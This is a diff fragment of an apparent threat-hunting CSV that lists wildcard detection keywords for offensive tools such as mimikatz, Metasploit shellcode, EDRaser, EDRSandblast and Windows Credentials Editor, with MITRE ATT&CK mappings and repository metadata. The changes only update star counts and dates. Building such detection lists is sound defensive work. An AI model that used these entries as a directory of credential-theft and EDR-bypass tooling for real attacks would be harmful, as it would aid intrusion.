Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" "*vyrus001/go-mimikatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/vyrus001/go-mimikatz","1","1","N/A","10","6","593","105","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z" "*vysecurity*","offensive_tool_keyword","Github Username","github username hosting red team tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/vysecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*vysecurity/ANGRYPUPPY*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" -"*-w *wordlists*.txt*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*-w *wordlists*.txt*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" "*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" -"*w32-speaking-shellcode.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*w32-speaking-shellcode.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*w32-speaking-shellcode-eaf.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*w32-speaking-shellcode.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*w32-speaking-shellcode.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*w32-speaking-shellcode-eaf.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*w3af_gui*","offensive_tool_keyword","w3af","w3af is a Web Application Attack and Audit Framework. The projects goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.","T1190 - T1211 - T1220 - T1222 - T1247 - T1592","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://w3af.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*WAF-bypass-Cheat-Sheet*","offensive_tool_keyword","WAF-bypass-Cheat-Sheet","WAF/IPS/DLP bypass Cheat Sheet","T1210 - T1204 - T1061 - T1133 - T1190","TA0001 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet","1","1","N/A","N/A","5","408","64","2018-11-28T20:34:17Z","2018-11-28T19:34:02Z" "*wafw00f https://*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*wafw00f*","offensive_tool_keyword","wafw00f","To do its magic. WAFW00F does the following Sends a normal HTTP request and analyses the response. this identifies a number of WAF solutions. If that is not successful. it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful. it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.","T1210.001 - T1190 - T1589","TA0007 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/EnableSecurity/wafw00f","1","1","N/A","N/A","10","4470","882","2023-06-28T09:24:59Z","2014-05-14T17:08:16Z" -"*wapiti -u*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wapiti.git*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wapiti.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wapiti3-*.tar.gz*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wapiti3-*-any.whl*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wapiti3/bin*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wapiti-getcookie*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wappalyzer.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*wafw00f*","offensive_tool_keyword","wafw00f","To do its magic. WAFW00F does the following Sends a normal HTTP request and analyses the response. this identifies a number of WAF solutions. If that is not successful. it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful. it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.","T1210.001 - T1190 - T1589","TA0007 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/EnableSecurity/wafw00f","1","1","N/A","N/A","10","4472","883","2023-06-28T09:24:59Z","2014-05-14T17:08:16Z" +"*wapiti -u*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti.git*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti3-*.tar.gz*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti3-*-any.whl*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti3/bin*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti-getcookie*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wappalyzer.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*warberry*","offensive_tool_keyword","warberry","WarBerryPi is a RaspberryPi based hardware implant that has the ability to go on stealth mode when used in acuiring informational data from a target network. especially useful during read teaming engagements. Its designed with a special feature that allows it to get the needed information within the shortest time possible. WarBerryPis scripts are designed in such way to avoid noise in the network as much as possible.","T1589 - T1539 - T1562","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/secgroundzero/warberry","1","1","N/A","N/A","10","2209","307","2019-11-09T00:09:44Z","2016-05-10T16:25:03Z" -"*warpzoneclient.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*warpzoneclient.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*warpzoneclient.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*warpzoneclient.sln*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*warpzoneclient.vcxproj*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.sln*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.vcxproj*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*wavestone-cdt/EDRSandblast*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" "*wavvs/nanorobeus*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" -"*waza1234*","offensive_tool_keyword","mimikatz","mimikatz exploitation default password","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*waza1234*","offensive_tool_keyword","mimikatz","mimikatz exploitation default password","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*WazeHell/sam-the-admin*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078.002 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","1","N/A","N/A","10","929","190","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" "*wce -i 3e5 -s *","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*wce*getlsasrvaddr.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*wce-master.zip*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*wce-universal.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*wcfrelayserver.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*wcfrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*WCMCredentials.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*wcfrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*WCMCredentials.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*wdextract *:\*\*.vdm*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*wdextract *\mrt.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*WDExtract-master*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" @@ -18147,10 +18333,10 @@ 